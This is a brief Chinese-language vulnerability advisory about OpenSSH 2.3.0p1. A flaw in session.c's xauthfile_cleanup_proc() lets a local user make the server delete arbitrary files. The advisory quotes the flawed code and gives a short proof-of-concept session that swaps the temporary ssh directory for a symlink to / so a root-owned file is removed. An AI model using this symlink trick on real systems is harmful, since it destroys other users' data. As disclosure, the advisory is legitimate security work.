OpenSSH 允许删除其他用户cookie文件发布时间:2001-06-14 更新时间:2001-06-14 严重程度:中 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 受影响系统 OpenSSH version 2.3.0p1 (FreeBSD, RedHat)详细描述 在OPENSSH里允许远程用户删除其他用户的cookie文件,而不需要知道用户密码, 错误代码存在于session.c 的xauthfile_cleanup_proc() 函数中: <SNIP> /* * Remove local Xauthority file. */ void xauthfile_cleanup_proc(void *ignore) { debug("xauthfile_cleanup_proc called"); if (xauthfile != NULL) { char *p; unlink(xauthfile); </SNIP> 测试代码 # touch /cookies;ls /cookies /cookies # ssh zen@localhost zen@localhost's password: Last login: Mon Jun 4 20:22:39 2001 from localhost.local Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown $ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 $ logout Connection to localhost closed. # ls /cookies /bin/ls: /cookies: No such file or directory 解决方案 尚无 相关信息 |
